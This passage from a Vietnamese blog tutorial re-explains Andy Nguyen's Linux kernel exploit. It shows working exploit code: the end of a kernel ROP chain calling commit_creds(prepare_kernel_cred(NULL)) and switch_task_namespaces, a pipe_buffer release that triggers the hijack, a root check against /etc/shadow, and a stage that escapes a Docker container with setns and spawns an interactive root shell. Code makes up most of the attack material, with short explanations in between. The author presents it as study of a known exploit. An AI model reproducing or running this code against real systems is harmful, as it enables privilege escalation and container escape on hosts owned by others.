  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R12
  *rop++ = 0xDEADBEEF; // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  // NOTE(review): the -0xA bias presumably cancels the 0xA displacement
  // suggested by the next gadget's name; confirm against the gadget.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#endif
}

Nguyên tắc hoạt động của Kernel ROP chain là:

Lưu giá trị của RBP tại một địa chỉ scratchpad nào đó (scratchpad giống như một mẩu giấy ghi chú để lưu trữ những kiến thức tạm thời khi bạn đọc 1 cuốn sách) để sau này sử dụng.
Gọi hàm commit_creds(prepare_kernel_cred(NULL)) để cài đặt kernel credentials
Gọi hàm switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) để chuyển namespace của process 1 sang namespace của init process.
Khôi phục lại giá trị của RBP và quay lại luồng thực thi cũ (ngay sau hàm free_pipe_info())

Releasing pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


 // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }

  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");

  printf("\n");

Sau khi đã xây dựng xong kernel_rop, chúng ta tiến hành giải phóng các vùng nhớ pipe_buffer để kích hoạt hàm pipe_release(). Bước này ta dùng vòng for để đi qua hết tất cả các pipe filedescriptor và dùng lệnh close để giải phóng vùng nhớ.
dòng lệnh 33-38 dùng để kiểm tra xem liệu chúng ta đã lấy được root hay chưa vì tệp /etc/shadow chỉ được đọc bởi root.

STAGE 5: Post-exploitation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29


 printf("[+] STAGE 5: Post-exploitation\n");

  printf("[*] Escaping container...\n");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  printf("[*] Cleaning up...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    // TODO: Fix next pointer.
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (close(ss[i][0]) < 0)
      perror("[-] close");
    if (close(ss[i][1]) < 0)
      perror("[-] close");
  }
  if (close(s) < 0)
    perror("[-] close");

  printf("[*] Popping root shell...\n");
  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

  return 0;

Đây là đoạn lệnh cho phép chúng ta thoát khỏi docker. Khi đã có root, chúng ta tiến hành thay đổi mnt, pid, net namespace để cho phép chúng ta thoát khỏi container. Đoạn lệnh 4-6 thực hiện sự thay đổi này.
Đoạn lệnh từ dòng 8-23 thực hiện thao tác dọn dẹp các message queue, đóng tất cả các socketpair.
Cuối cùng thực hiện lệnh để chạy shell của root dòng 25-27

Tóm lại

Bài này tôi chỉ viết lại từ bài viết chính của tác giả, thêm vào đó, là những giải thích của tôi về những vấn đề tác giả chưa nói rõ hoặc quá căn bản với tác giả nhưng không hề với tôi.
Vì kiến thức tôi còn hạn chế, nên những giải thích có thể đúng hoặc sai, nếu sai, rất mong nhận được sự góp ý để hoàn thiện hơn.
Lời cuối, chân thành cảm ơn sự cống hiến của tác giả - Andy Nguyen (theflow@) - đặc biệt poc của anh, đã giúp tôi rất nhiều trong quá trình nâng cao kĩ năng của mình.